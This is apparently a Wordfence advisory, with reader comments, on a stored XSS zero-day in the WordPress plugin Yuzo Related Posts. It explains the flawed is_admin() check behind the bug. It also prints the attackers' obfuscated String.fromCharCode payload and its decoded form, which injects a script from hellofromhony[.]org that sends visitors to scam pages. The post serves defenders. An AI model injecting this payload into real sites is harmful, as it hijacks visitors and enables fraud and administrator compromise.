Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild
The Yuzo Related Posts plugin, which is installed on over 60,000 websites, was removed from the WordPress.org plugin directory on March 30, 2019 after an unpatched vulnerability was publicly, and irresponsibly, disclosed by a security researcher that same day. The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.
The XSS protection included in the Wordfence firewall protects against the exploit attempts we have seen so far. Both free and Premium Wordfence users are protected against these attacks. Based on a deeper analysis of the security flaws present in the plugin we have also deployed protection against additional attack vectors. Premium customers will receive the update today, free users in 30 days. We recommend that all users remove the plugin from their sites immediately.
is_admin() Strikes Again
The vulnerability in Yuzo Related Posts stems from missing authentication checks in the plugin routines responsible for storing settings in the database. The code below from assets/ilenframework/core.php
is the crux of the problem.
function __construct(){ if( ! is_admin() ){ // only front-end self::set_main_variable(); return; }elseif( is_admin() ){ // only admin // set default if not exists self::_ini_();
Developers often mistakenly use is_admin()
to check if a piece of code that requires administrative privileges should be run, but as the WordPress documentation points out, that isn’t how the function should be used. In this scenario self::_ini_()
is called on any request to an administrative interface page, including /wp-admin/options-general.php
and /wp-admin/admin-post.php
, which allows a POST request to those pages to be processed by self::save_options();
later in the code.
The result is that an unauthenticated attacker can inject malicious content, such as a JavaScript payload, into the plugin settings. That payload is then inserted into HTML templates and executed by the web browser when users visit the compromised website. This security issue could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, among other things.
Exploits Lead to Malicious Redirects
Today, eleven days after this vulnerability was irresponsibly disclosed and a proof-of-concept (PoC) was published, threat actors have begun exploiting sites with Yuzo Related Posts installed.
Exploits currently seen in the wild inject malicious JavaScript into the yuzo_related_post_css_and_style
option value.
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
Once deobfuscated, it’s easier to see what the script is doing:
</style><script language=javascript>var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.async = true; elem.src = 'https://hellofromhony[.]org/counter'; document.getElementsByTagName('head')[0].appendChild(elem);</script>
When a user visits a compromised website containing the above payload, they will be redirected to malicious tech support scam pages. Example:
Three Vulnerabilities with a Lot in Common
Our analysis shows that the attempts to exploit this vulnerability share a number of commonalities with attacks on two other vulnerabilities discovered in other plugins: Social Warfare and Easy WP SMTP.
Exploits so far have used a malicious script hosted on hellofromhony[.]org
, which resolves to 176.123.9[.]53
. That same IP address was used in the Social Warfare and Easy WP SMTP campaigns. In addition, all three campaigns involved exploitation of stored XSS injection vulnerabilities and have deployed malicious redirects. We are confident that the tactics, techniques and procedures (TTPs) in all three attacks point to a common threat actor.
Conclusion
As was the case a few weeks ago, the irresponsible actions of a security researcher has resulted in a zero-day plugin vulnerability being exploited in the wild. Cases like this underscore the importance of a layered security approach which includes a WordPress firewall.
Site owners running the Yuzo Related Posts plugin are urged to remove it from their sites immediately, at least until a fix has been published by the author. Wordfence Premium customers and free users have been protected against the current attacks we’re seeing in the wild. An additional firewall rule to protect against alternate exploits has been developed and deployed to our Premium customers today and will be available to free users in 30 days.
Comments
1:05 pm
Thanks for keeping us posted!
Something similar happened to me on Monday - it was a different plugin, but the result was the same - i lost my admin privileges, and half my site is currently down...(one of two plugins, i still cant figure out which one, but they were the only two plugins i installed on that day)
1:48 pm
Given how often the misunderstanding around is_admin() causes problems similar to this, perhaps it's time to rename the function is_admin_page(), or something else which clearly indicates that the function is not related to the privileges of the caller.
2:21 pm
This can be also checked by current_user_can function.
4:52 pm
My site used it and was redirected all. I must delete it yesterday
11:08 am
I too switched to this plugin from YARPP and this morning discovered I could not access my blog. Luckily I was logged in, in another tab and was able to find a WordPress forum thread or two and fix this. But related post plugins seem to be particularly problematic. Supposedly JetPack has this feature now but I'm thinking of just not having this feature on my blog anymore.
6:01 pm
Thank you for all you do, Wordfence. Had forgotten this was the plugin on our site because the name on the plugin list didn't include Yuzo. But there it was...and now it's gone.
1:28 am
Will deactivating the plugin until it is patched protect from the exploit?
8:27 am
We recommend that you remove it from your site immediately.
1:57 am
Thank you for this. I was a victim as well and unfortunately installed Wordfence only after this.
Could this have been prevented if I had Wordfence installed before?
8:16 am
The Wordfence firewall would have blocked the attacks we're seeing in the wild, yes.
3:36 am
Thanks for the update. Unfortunately on one of my websites Wordfence broke probably due to an update and it was injected by this Yuzo Related Posts attack. Any chance to repair this? Or restore a complete backup?
10:10 am
Restoring from a recent backup can definitely get you back on your feet. We also have a security services team that can assist. https://www.wordfence.com/wordfence-site-cleanings/
5:33 am
I am not a plugin developer, but I use !is_admin() conditionals in functions.php to dequeue scripts/styles which I don't need in the front-end, for example jQuery. Is this usage of !is_admin() safe or not?
2:08 pm
This would be fine. Definitely review the WordPress documentation when using any core function.
11:46 am
Hello,
I installed WordFence and did not have this plugin, yet it happened. I had the latest WordFence installed.
How does this happen?
Thank you for any help. I don't mind paying for the help to make sure it doesn't happen.
10:12 am
I'm sorry to hear you're having issues with your site. If you did not have the Yuzo Related Posts plugin installed, it's unlikely that this was what had happened. If you need a security team to take a look at your site and investigate, please check with our Security Services Team. https://www.wordfence.com/wordfence-site-cleanings/
12:43 pm
My page was infected, I have Wordfence installed but I do not know what happened. I can not enter the wordpress admin panel because it is redirected to another hellofromhony page.
I would like to know how can we clean our website of this malware?
NOTE: the page that I put in the website field is not the one that is infected.
Thanks in advance for your collaboration.
10:31 am
Hi Ederson, I'm sorry to learn your site is redirecting. If you have a recent backup, you could restore from it and remove the Yuzo Related Posts plugin to remove the vulnerability. You may be able to investigate if it's simply a change in your database using PhpMyAdmin if you have that set up in your hosting account. If you need help, our Security Services Team can help. https://www.wordfence.com/wordfence-site-cleanings/ Or you can review this guide for cleaning a hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
7:36 pm
I noticed an unknown user created on my site with a administrator role attached, could be as a result of this?
10:38 am
Hi John, compromising administrator accounts is one method of exploiting the vulnerabilities within Yuzo Related Posts.
11:46 pm
Hello My websote has been hacked and affected Yesterday. When i access to my website it says redirects to [https://]hellofromhony[.]com/go.php?temp=5&/
Also i cant access to my wp login.php
How this happens??? Please Help me
10:42 am
Hi Saim, I'm sorry to hear you're having issues. You can restore from a recent backup and remove the Yuzo Related Posts plugin, or follow this guide for cleaning your hacked site. https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ If you need help beyond that, our Security Services Team can assist. https://www.wordfence.com/wordfence-site-cleanings/
9:13 am
Hi,
Is there any way in settings (.htaccess..) that could help us to survive zeo-day attack (like this one or Yellow Pencil)?
Thanks!
10:45 am
If you don't have Wordfence Premium with updated firewall rules to protect you, we recommend removing the vulnerable plugins until they have been patched.
11:26 am
I've spent maybe a total of 24 hours the last three days figuring out why my sites kept being redirected to scam sites. Everytime I restored my site and about 10 hours later the hack returned. Then I accidentally found this page. Thanks a lot! I hope that the hacking of my sites now will stop. Next step -> get the Wordfence Premium!!
2:28 am
Thanks for the rare work and updates.
9:46 am
Very well, I followed some guides about how to clean it but still I had problems. ,,... until I figured out that I have to clear cash too.
10:31 am
my site was hacked, and redirected ads sites.
It was big problem for me,
after completely removed site, then restore from backup.
now site on, but I didn't know reason is this plugin
after few days i found this articles.
same thing happen to my site, described on this article
9:06 am
Does anyone know of an alternative to this related posts plugin?
1:35 pm
There are quite a few related posts plugins available in the repository: https://wordpress.org/plugins/search/related+posts/